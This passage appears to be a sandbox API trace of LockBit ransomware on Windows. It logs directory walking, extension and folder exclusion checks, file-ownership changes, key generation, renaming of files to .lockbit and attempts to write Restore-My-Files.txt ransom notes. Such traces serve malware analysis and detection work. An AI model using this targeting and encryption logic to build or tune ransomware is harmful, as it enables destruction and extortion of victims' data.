nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.248] malloc (_Size=0xbe) returned 0x1ff1e60 [0085.248] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0085.249] free (_Block=0x1ff1e60) [0085.249] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.249] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.249] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.249] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Postage_VideoInset.png", cAlternateFileName="")) returned 1 [0085.249] lstrcmpiW (lpString1=".", lpString2="Postage_VideoInset.png") returned -1 [0085.249] lstrcmpiW (lpString1="..", lpString2="Postage_VideoInset.png") returned -1 [0085.249] PathFindExtensionW (pszPath="Postage_VideoInset.png") returned=".png" [0085.249] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.249] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.250] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.250] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.250] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.251] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.251] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.252] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.252] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Postage_VideoInset.png") returned 1 [0085.252] lstrcmpiW (lpString1="ntldr", lpString2="Postage_VideoInset.png") returned -1 [0085.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Postage_VideoInset.png") returned -1 [0085.252] lstrcmpiW (lpString1="bootsect.bak", lpString2="Postage_VideoInset.png") returned -1 [0085.252] lstrcmpiW (lpString1="autorun.inf", lpString2="Postage_VideoInset.png") returned -1 [0085.252] lstrcmpiW (lpString1="thumbs.db", lpString2="Postage_VideoInset.png") returned 1 [0085.252] lstrcmpiW (lpString1="iconcache.db", lpString2="Postage_VideoInset.png") returned -1 [0085.252] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.252] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned=".png" [0085.252] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.252] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.252] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.252] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.253] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.253] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.lockbit") returned 75 [0085.254] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.254] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.255] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.255] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.255] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.255] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.255] RtlFreeAnsiString (AnsiString="\\") [0085.255] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0085.256] malloc (_Size=0x200) returned 0x77d800 [0085.256] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.256] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.256] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.256] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.256] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.257] CloseHandle (hObject=0x3c0) returned 1 [0085.257] free (_Block=0x77d800) [0085.257] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.257] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.257] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.258] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3214) returned 1 [0085.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.259] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.272] malloc (_Size=0xac) returned 0x77d800 [0085.272] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0085.273] free (_Block=0x77d800) [0085.273] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.273] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.273] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.273] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Push", cAlternateFileName="")) returned 1 [0085.273] lstrcmpiW (lpString1=".", lpString2="Push") returned -1 [0085.273] lstrcmpiW (lpString1="..", lpString2="Push") returned -1 [0085.273] lstrcmpiW (lpString1="Push", lpString2="$windows.~bt") returned 1 [0085.273] lstrcmpiW (lpString1="Push", lpString2="intel") returned 1 [0085.273] lstrcmpiW (lpString1="Push", lpString2="msocache") returned 1 [0085.273] lstrcmpiW (lpString1="Push", lpString2="$recycle.bin") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="$windows.~ws") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="tor browser") returned -1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="boot") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="system volume information") returned -1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="perflogs") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="google") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="application data") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="windows") returned -1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="windows.old") returned -1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="appdata") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="Windows nt") returned -1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="Msbuild") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="Microsoft") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="All users") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="mozilla") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="Microsoft.NET") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="microsoft shared") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="Internet Explorer") returned 1 [0085.274] lstrcmpiW (lpString1="Push", lpString2="common files") returned 1 [0085.275] lstrcmpiW (lpString1="Push", lpString2="opera") returned 1 [0085.275] lstrcmpiW (lpString1="Push", lpString2="Windows Journal") returned -1 [0085.275] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 49 [0085.275] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*") returned 51 [0085.275] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0085.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.284] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.284] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0085.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.284] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0085.284] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0085.284] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0085.284] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0085.284] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.284] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.284] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.285] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.285] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.286] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.286] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.286] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.286] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0085.286] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0085.286] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.286] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png") returned=".png" [0085.286] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.286] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.286] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.287] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.287] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.287] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.287] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.287] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.288] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.288] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png.lockbit") returned 75 [0085.288] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.288] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.289] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.289] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.289] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.289] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.289] RtlFreeAnsiString (AnsiString="\\") [0085.289] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0085.290] malloc (_Size=0x200) returned 0x77d800 [0085.290] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.290] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.290] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.290] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.290] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.291] CloseHandle 